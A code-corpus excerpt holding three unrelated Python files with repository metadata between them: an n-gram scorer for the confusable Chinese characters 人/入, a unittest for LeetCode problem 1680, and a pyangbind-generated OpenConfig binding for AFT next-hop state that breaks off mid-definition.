        prop_dict_path: file written by generate_propdic().

    Returns:
        Tuple ``(word2idx_dic, prop_dict)``.
    """
    print('载入概率字典----')
    return load_dic(word2idx_path), load_dic(prop_dict_path)
def load_id2word(idx2word_path):
    """Load the index -> word dictionary previously saved by save_dic()."""
    return load_dic(idx2word_path)
def judge_word(candidate_list, prop_dict_path, word2idx_path, test_path=None, test_sentence=None):
    """For every occurrence of a candidate character, print the likeliest one.

    Scores each candidate by averaging the smoothed n-gram probabilities of
    the surrounding context (up to two characters on each side) and reports
    the best-scoring candidate per occurrence.

    Args:
        candidate_list: easily-confused characters to disambiguate.
        prop_dict_path: NOTE(review) -- despite the name this receives the
            loaded probability *dictionary*, not a path (see the __main__
            call); consider renaming.
        word2idx_path: NOTE(review) -- likewise the loaded word->index dict.
        test_path: optional path of a text file to check.
        test_sentence: optional literal sentence to check.

    NOTE(review): if both test_path and test_sentence are None, context_all
    is never bound and a NameError follows -- confirm callers always pass one.
    """
    print('Start judge-------------------')
    if test_path is not None:
        # NOTE(review): f2 is never closed -- consider a "with" block.
        f2 = open(test_path, 'r', encoding='utf-8')
        print('Load test text……')
        sentence = []
        for line in f2.readlines():
            # line = rm_useless_tokens(line).strip()
            for x in line:
                if x != ' ' and x != '':
                    sentence.append(x)
        context_all = sentence
    if test_sentence is not None:
        # a literal sentence overrides the file contents
        context_all = list(test_sentence.strip())
    # NOTE(review): uses the module-level word2idx_dic instead of the
    # word2idx_path parameter -- only works after __main__ defined it.
    context_idx = word2idx(context_all, word2idx_dic)
    i = 0
    num = 0
    left = 0
    right = 0
    for index in range(len(context_all)):
        if context_all[index] in candidate_list:
            prop={}
            i += 1
            print('第{}处:'.format(i))
            # determine how many context characters exist on each side
            if index > 1 and index < len(context_all)-2:
                num = 3
                left = 2
                right = 2
            elif index == 1:
                num = 2
                left = 1
                if index < len(context_all)-2:
                    right = 2
                elif index == len(context_all)-2:
                    right = 1
                elif index == len(context_all)-1:
                    right = 0
            elif index == 0:
                num = 1
                left = 0
                if index < len(context_all)-2:
                    right = 2
                elif index == len(context_all)-2:
                    right = 1
                elif index == len(context_all)-1:
                    right = 0
            # NOTE(review): occurrences with index > 1 near the end of the
            # text match none of the branches above, so left/right keep their
            # values from the previous occurrence -- confirm intended.
            for candidate in candidate_list:
                p = 0
                candidata_idx = str(word2idx_path[candidate])
                print(candidata_idx)
                if left == 2 and right == 2:
                    left1 = str(context_idx[index-1])
                    left2 = str(context_idx[index-2])
                    right1 = str(context_idx[index+1])
                    right2 = str(context_idx[index+2])
                    print(left1, left2, right1, right2)
                    if candidata_idx in prop_dict_path and (left1,candidata_idx) in prop_dict_path and (candidata_idx,right1) in prop_dict_path and (left2, left1,candidata_idx) in prop_dict_path and (candidata_idx, right1, right2) in prop_dict_path and (left1, candidata_idx, right1) in prop_dict_path and (left2, left1, candidata_idx, right1, right2) in prop_dict_path:
                        print("-----------1-----------")
                        # average of all seven applicable n-gram scores
                        p = (prop_dict_path[candidata_idx]
                             + prop_dict_path[(left1, candidata_idx)]
                             + prop_dict_path[(candidata_idx, right1)]
                             + prop_dict_path[(left2, left1, candidata_idx)]
                             + prop_dict_path[(candidata_idx, right1, right2)]
                             + prop_dict_path[(left1, candidata_idx, right1)]
                             + prop_dict_path[(left2, left1, candidata_idx, right1, right2)]
                             )/7
                elif left == 1 and right == 2:
                    left1 = str(context_idx[index-1])
                    right1 = str(context_idx[index+1])
                    right2 = str(context_idx[index+2])
                    if candidata_idx in prop_dict_path and (left1,candidata_idx) in prop_dict_path and (candidata_idx, right1) in prop_dict_path and (candidata_idx, right1, right2) in prop_dict_path and (left1, candidata_idx, right1) in prop_dict_path:
                        print("-----2")
                        p = (prop_dict_path[candidata_idx]
                             + prop_dict_path[(left1,candidata_idx)]
                             + prop_dict_path[(candidata_idx, right1)]
                             + prop_dict_path[(candidata_idx, right1, right2)]
                             + prop_dict_path[(left1, candidata_idx, right1)]
                             )/5
                elif left == 1 and right == 1:
                    print("------------3----------")
                    left1 = str(context_idx[index-1])
                    right1 = str(context_idx[index+1])
                    if candidata_idx in prop_dict_path and (left1, candidata_idx) in prop_dict_path and (candidata_idx, right1) in prop_dict_path and (left1, candidata_idx, right1) in prop_dict_path:
                        p = (prop_dict_path[candidata_idx]
                             + prop_dict_path[(left1, candidata_idx)]
                             + prop_dict_path[(candidata_idx, right1)]
                             + prop_dict_path[(left1, candidata_idx, right1)]
                             )/4
                elif left == 1 and right == 0:
                    print("----------4--------------")
                    left1 = str(context_idx[index-1])
                    if candidata_idx in prop_dict_path and (left1, candidata_idx) in prop_dict_path:
                        p = (prop_dict_path[candidata_idx]
                             + prop_dict_path[(left1, candidata_idx)]
                             )/2
                elif left == 0 and right == 2:
                    right1 = str(context_idx[index+1])
                    right2 = str(context_idx[index+2])
                    if candidata_idx in prop_dict_path and (candidata_idx, right1) in prop_dict_path and (candidata_idx, right1, right2) in prop_dict_path:
                        p = (prop_dict_path[candidata_idx]
                             + prop_dict_path[(candidata_idx, right1)]
                             + prop_dict_path[(candidata_idx, right1, right2)]
                             )/3
                elif left == 0 and right == 1:
                    right1 = str(context_idx[index+1])
                    if candidata_idx in prop_dict_path and (candidata_idx, right1) in prop_dict_path:
                        p = (prop_dict_path[candidata_idx]
                             + prop_dict_path[(candidata_idx, right1)]
                             )/2
                elif left == 0 and right == 0:
                    if candidata_idx in prop_dict_path:
                        p = prop_dict_path[candidata_idx]
                prop[candidate] = p
            # rank candidates by score, ascending; best candidate is last
            proplist = sorted(prop.items(),key = lambda x:x[1])
            print(proplist)
            # a tie between the two best scores means "undecided"
            if proplist[-1][1] == proplist[-2][1]:
                word = '不能确定是哪个字'
            else:
                word = proplist[-1][0]
            print('sentence "{0}" 中第{1}个字可能为: \033[1;33m{2}\033[0m'.format(context_all[index], num, word))
if __name__ == "__main__":
    # # Step 1: segment the training text (run once)
    # ChineseParticiple(RAW_TEXT_PATH, PARTED_TEXT_PATH)
    # # Step 2: build the dictionaries and save them locally (run once)
    # word_to_idx, idx_to_word = generate_dic(PARTED_TEXT_PATH)
    # save_dic(word_to_idx, WORD2IDX_PATH)
    # save_dic(idx_to_word, IDX2WORD_PATH)
    # Step 3: build the n-gram probability dictionary for the confusable set
    generate_propdic(PARTED_TEXT_PATH, WORD2IDX_PATH, IDX2WORD_PATH, similar_word, PROP_DICT_PATH)
    # The steps above only need to rerun when the raw corpus changes.
    # Load the dictionaries back and judge the confusable pair.
    word2idx_dic, prop_dict = load(WORD2IDX_PATH, PROP_DICT_PATH)
    judge_word(['人', '入'], prop_dict, word2idx_dic, test_path=TEST_PATH)
    # judge_word(['人', '入'], prop_dict, word2idx_dic, test_sentence='对人民抗日武装')
| [
"erzzhang@163.com"
] | erzzhang@163.com |
0e512d5cc3c40a98f88773bb04257a5009284703 | a8062308fb3bf6c8952257504a50c3e97d801294 | /test/test_1680_concatenation_of_consecutive_binary_numbers.py | 2e973fa95d840dec8ee1b362d393d6690776c76f | [] | no_license | wan-catherine/Leetcode | 650d697a873ad23c0b64d08ad525bf9fcdb62b1b | 238995bd23c8a6c40c6035890e94baa2473d4bbc | refs/heads/master | 2023-09-01T00:56:27.677230 | 2023-08-31T00:49:31 | 2023-08-31T00:49:31 | 143,770,000 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 460 | py | from unittest import TestCase
from problems.N1680_Concatenation_Of_Consecutive_Binary_Numbers import Solution
class TestSolution(TestCase):
    """Unit tests for Solution.concatenatedBinary (LeetCode problem 1680)."""

    def test_concatenatedBinary(self):
        # n = 1: binary "1" -> 1
        self.assertEqual(1, Solution().concatenatedBinary(1))

    def test_concatenatedBinary_1(self):
        # n = 3: "1" + "10" + "11" = 0b11011 = 27
        self.assertEqual(27, Solution().concatenatedBinary(3))

    def test_concatenatedBinary_2(self):
        # n = 12 -- presumably taken modulo 1e9+7 per the problem; confirm
        self.assertEqual(505379714, Solution().concatenatedBinary(12))
| [
"rarry2012@gmail.com"
] | rarry2012@gmail.com |
c2f109d8653198c97abaf0506e538f09dafebf27 | a479a5773fd5607f96c3b84fed57733fe39c3dbb | /napalm_yang/models/openconfig/network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/__init__.py | 9f9a949d618408cef24874b85b55dba45410a6d5 | [
"Apache-2.0"
] | permissive | napalm-automation/napalm-yang | 839c711e9294745534f5fbbe115e0100b645dbca | 9148e015b086ebe311c07deb92e168ea36fd7771 | refs/heads/develop | 2021-01-11T07:17:20.226734 | 2019-05-15T08:43:03 | 2019-05-15T08:43:03 | 69,226,025 | 65 | 64 | Apache-2.0 | 2019-05-15T08:43:24 | 2016-09-26T07:48:42 | Python | UTF-8 | Python | false | false | 136,581 | py | # -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# Compatibility shim: expose the PY2 names ``__builtin__`` and ``long`` on
# Python 3 so the generated bindings below run unchanged on both majors.
if six.PY3:
    import builtins as __builtin__

    long = int
elif six.PY2:
    import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/afts/aft/entries/entry/next-hops/next-hop/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Operational state parameters relating to the AFT
next-hop entry
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__index",
"__weight",
"__ip_address",
"__mac_address",
"__popped_mpls_label_stack",
"__pushed_mpls_label_stack",
"__decapsulate_header",
"__encapsulate_header",
"__origin_protocol",
)
_yang_name = "state"
_pybind_generated_by = "container"
    def __init__(self, *args, **kwargs):
        """Initialise the AFT next-hop state container.

        Every leaf is wrapped in a pyangbind YANGDynClass carrying its YANG
        type restrictions; all leaves are operational state (is_config=False).
        One positional argument may be supplied: an object exposing the same
        pyangbind elements, whose changed values are copied into this one.
        """
        self._path_helper = False
        self._extmethods = False
        # uint64 identifier for the next-hop entry.
        self.__index = YANGDynClass(
            base=RestrictedClassType(
                base_type=long,
                restriction_dict={"range": ["0..18446744073709551615"]},
                int_size=64,
            ),
            is_leaf=True,
            yang_name="index",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="uint64",
            is_config=False,
        )
        # uint32 load-balancing weight of this next-hop.
        self.__weight = YANGDynClass(
            base=RestrictedClassType(
                base_type=long,
                restriction_dict={"range": ["0..4294967295"]},
                int_size=32,
            ),
            is_leaf=True,
            yang_name="weight",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="uint32",
            is_config=False,
        )
        # ip-address-no-zone union: IPv4 or IPv6 pattern-restricted strings.
        self.__ip_address = YANGDynClass(
            base=[
                RestrictedClassType(
                    base_type=RestrictedClassType(
                        base_type=six.text_type,
                        restriction_dict={
                            "pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
                        },
                    ),
                    restriction_dict={"pattern": "[0-9\\.]*"},
                ),
                RestrictedClassType(
                    base_type=RestrictedClassType(
                        base_type=six.text_type,
                        restriction_dict={
                            "pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
                        },
                    ),
                    restriction_dict={"pattern": "[0-9a-fA-F:\\.]*"},
                ),
            ],
            is_leaf=True,
            yang_name="ip-address",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="inet:ip-address-no-zone",
            is_config=False,
        )
        # MAC address in colon-separated hex form.
        self.__mac_address = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_dict={"pattern": "[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}"},
            ),
            is_leaf=True,
            yang_name="mac-address",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="yang:mac-address",
            is_config=False,
        )
        # Leaf-list of MPLS labels: numeric 16..1048575 or a reserved-label name.
        self.__popped_mpls_label_stack = YANGDynClass(
            base=TypedListType(
                allowed_type=[
                    RestrictedClassType(
                        base_type=RestrictedClassType(
                            base_type=long,
                            restriction_dict={"range": ["0..4294967295"]},
                            int_size=32,
                        ),
                        restriction_dict={"range": ["16..1048575"]},
                    ),
                    RestrictedClassType(
                        base_type=six.text_type,
                        restriction_type="dict_key",
                        restriction_arg={
                            "IPV4_EXPLICIT_NULL": {"value": 0},
                            "ROUTER_ALERT": {"value": 1},
                            "IPV6_EXPLICIT_NULL": {"value": 2},
                            "IMPLICIT_NULL": {"value": 3},
                            "ENTROPY_LABEL_INDICATOR": {"value": 7},
                            "NO_LABEL": {},
                        },
                    ),
                ]
            ),
            is_leaf=False,
            yang_name="popped-mpls-label-stack",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="oc-mplst:mpls-label",
            is_config=False,
        )
        # Same label-list type as above, for labels pushed on egress.
        self.__pushed_mpls_label_stack = YANGDynClass(
            base=TypedListType(
                allowed_type=[
                    RestrictedClassType(
                        base_type=RestrictedClassType(
                            base_type=long,
                            restriction_dict={"range": ["0..4294967295"]},
                            int_size=32,
                        ),
                        restriction_dict={"range": ["16..1048575"]},
                    ),
                    RestrictedClassType(
                        base_type=six.text_type,
                        restriction_type="dict_key",
                        restriction_arg={
                            "IPV4_EXPLICIT_NULL": {"value": 0},
                            "ROUTER_ALERT": {"value": 1},
                            "IPV6_EXPLICIT_NULL": {"value": 2},
                            "IMPLICIT_NULL": {"value": 3},
                            "ENTROPY_LABEL_INDICATOR": {"value": 7},
                            "NO_LABEL": {},
                        },
                    ),
                ]
            ),
            is_leaf=False,
            yang_name="pushed-mpls-label-stack",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="oc-mplst:mpls-label",
            is_config=False,
        )
        # Encapsulation header type removed on forwarding (GRE/IPV4/IPV6/MPLS).
        self.__decapsulate_header = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
            ),
            is_leaf=True,
            yang_name="decapsulate-header",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="oc-aftt:encapsulation-header-type",
            is_config=False,
        )
        # Encapsulation header type added on forwarding (GRE/IPV4/IPV6/MPLS).
        self.__encapsulate_header = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={"GRE": {}, "IPV4": {}, "IPV6": {}, "MPLS": {}},
            ),
            is_leaf=True,
            yang_name="encapsulate-header",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="oc-aftt:encapsulation-header-type",
            is_config=False,
        )
        # identityref to the protocol that originated the entry; the dict lists
        # every accepted spelling (bare, oc-pol-types:, oc-pt: prefixes).
        self.__origin_protocol = YANGDynClass(
            base=RestrictedClassType(
                base_type=six.text_type,
                restriction_type="dict_key",
                restriction_arg={
                    "BGP": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:BGP": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:BGP": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "ISIS": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:ISIS": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:ISIS": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "OSPF": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:OSPF": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:OSPF": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "OSPF3": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:OSPF3": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:OSPF3": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "STATIC": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:STATIC": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:STATIC": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "DIRECTLY_CONNECTED": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:DIRECTLY_CONNECTED": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:DIRECTLY_CONNECTED": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "LOCAL_AGGREGATE": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pol-types:LOCAL_AGGREGATE": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                    "oc-pt:LOCAL_AGGREGATE": {
                        "@module": "openconfig-policy-types",
                        "@namespace": "http://openconfig.net/yang/policy-types",
                    },
                },
            ),
            is_leaf=True,
            yang_name="origin-protocol",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="identityref",
            is_config=False,
        )
        # Optional pyangbind copy-construction: mirror changed leaves from a
        # compatible object passed positionally.
        load = kwargs.pop("load", None)
        if args:
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"afts",
"aft",
"entries",
"entry",
"next-hops",
"next-hop",
"state",
]
    def _get_index(self):
        """
        Getter method for index, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/index (uint64)
        YANG Description: A unique entry for the next-hop
        """
        # Returns the YANGDynClass-wrapped uint64 leaf.
        return self.__index
    def _set_index(self, v, load=False):
        """
        Setter method for index, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/index (uint64)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_index is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_index() directly.
        YANG Description: A unique entry for the next-hop
        """
        # Unwrap pyangbind union/typedef values into their native type first.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        # Re-wrap the value; TypeError/ValueError means it violates uint64.
        try:
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=long,
                    restriction_dict={"range": ["0..18446744073709551615"]},
                    int_size=64,
                ),
                is_leaf=True,
                yang_name="index",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="uint64",
                is_config=False,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """index must be of a type compatible with uint64""",
                    "defined-type": "uint64",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), is_leaf=True, yang_name="index", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint64', is_config=False)""",
                }
            )
        self.__index = t
        if hasattr(self, "_set"):
            self._set()
    def _unset_index(self):
        # Reset the leaf to a fresh, default-initialised wrapper.
        self.__index = YANGDynClass(
            base=RestrictedClassType(
                base_type=long,
                restriction_dict={"range": ["0..18446744073709551615"]},
                int_size=64,
            ),
            is_leaf=True,
            yang_name="index",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="uint64",
            is_config=False,
        )
    def _get_weight(self):
        """
        Getter method for weight, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/weight (uint32)
        YANG Description: The weight of the next-hop. Traffic is balanced according to
        the ratio described by the relative weights of the next hops
        that exist for the AFT entry. Note that all next-hops that are
        specified are assumed to be active next-hops and therefore
        eligible (and selected) to be installed in the FIB, and hence
        used for packet forwarding.
        """
        # Returns the YANGDynClass-wrapped uint32 leaf.
        return self.__weight
    def _set_weight(self, v, load=False):
        """
        Setter method for weight, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/weight (uint32)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_weight is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_weight() directly.
        YANG Description: The weight of the next-hop. Traffic is balanced according to
        the ratio described by the relative weights of the next hops
        that exist for the AFT entry. Note that all next-hops that are
        specified are assumed to be active next-hops and therefore
        eligible (and selected) to be installed in the FIB, and hence
        used for packet forwarding.
        """
        # Unwrap pyangbind union/typedef values into their native type first.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        # Re-wrap the value; TypeError/ValueError means it violates uint32.
        try:
            t = YANGDynClass(
                v,
                base=RestrictedClassType(
                    base_type=long,
                    restriction_dict={"range": ["0..4294967295"]},
                    int_size=32,
                ),
                is_leaf=True,
                yang_name="weight",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="uint32",
                is_config=False,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """weight must be of a type compatible with uint32""",
                    "defined-type": "uint32",
                    "generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
                }
            )
        self.__weight = t
        if hasattr(self, "_set"):
            self._set()
    def _unset_weight(self):
        # Reset the leaf to a fresh, default-initialised wrapper.
        self.__weight = YANGDynClass(
            base=RestrictedClassType(
                base_type=long,
                restriction_dict={"range": ["0..4294967295"]},
                int_size=32,
            ),
            is_leaf=True,
            yang_name="weight",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="uint32",
            is_config=False,
        )
    def _get_ip_address(self):
        """
        Getter method for ip_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/ip_address (inet:ip-address-no-zone)
        YANG Description: The IP address of the next-hop system.
        """
        # Returns the union-typed (IPv4 or IPv6, no zone) leaf wrapper.
        return self.__ip_address
    def _set_ip_address(self, v, load=False):
        """
        Setter method for ip_address, mapped from YANG variable /network_instances/network_instance/afts/aft/entries/entry/next_hops/next_hop/state/ip_address (inet:ip-address-no-zone)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_ip_address is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_ip_address() directly.
        YANG Description: The IP address of the next-hop system.
        """
        # Unwrap pyangbind union/typedef values into their native type first.
        if hasattr(v, "_utype"):
            v = v._utype(v)
        # Re-wrap the value against the IPv4/IPv6 union; a TypeError or
        # ValueError means neither pattern accepted it.
        try:
            t = YANGDynClass(
                v,
                base=[
                    RestrictedClassType(
                        base_type=RestrictedClassType(
                            base_type=six.text_type,
                            restriction_dict={
                                "pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
                            },
                        ),
                        restriction_dict={"pattern": "[0-9\\.]*"},
                    ),
                    RestrictedClassType(
                        base_type=RestrictedClassType(
                            base_type=six.text_type,
                            restriction_dict={
                                "pattern": "((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?"
                            },
                        ),
                        restriction_dict={"pattern": "[0-9a-fA-F:\\.]*"},
                    ),
                ],
                is_leaf=True,
                yang_name="ip-address",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="inet:ip-address-no-zone",
                is_config=False,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """ip_address must be of a type compatible with inet:ip-address-no-zone""",
                    "defined-type": "inet:ip-address-no-zone",
                    "generated-type": """YANGDynClass(base=[RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9\\.]*'}),RestrictedClassType(base_type=RestrictedClassType(base_type=six.text_type, restriction_dict={'pattern': '((:|[0-9a-fA-F]{0,4}):)([0-9a-fA-F]{0,4}:){0,5}((([0-9a-fA-F]{0,4}:)?(:|[0-9a-fA-F]{0,4}))|(((25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9]?[0-9])))(%[\\p{N}\\p{L}]+)?'}), restriction_dict={'pattern': '[0-9a-fA-F:\\.]*'}),], is_leaf=True, yang_name="ip-address", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='inet:ip-address-no-zone', is_config=False)""",
                }
            )
        self.__ip_address = t
        if hasattr(self, "_set"):
            self._set()
    def _unset_ip_address(self):
        # Reset the leaf to a fresh, default-initialised wrapper.
        self.__ip_address = YANGDynClass(
            base=[
                RestrictedClassType(
                    base_type=RestrictedClassType(
                        base_type=six.text_type,
                        restriction_dict={
                            "pattern": "(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?"
                        },
                    ),
                    restriction_dict={"pattern": "[0-9\\.]*"},
                ),
                RestrictedClassType(
                    base_type=RestrictedClassType(
                        base_type=six.text_type,
                        restriction_dict={
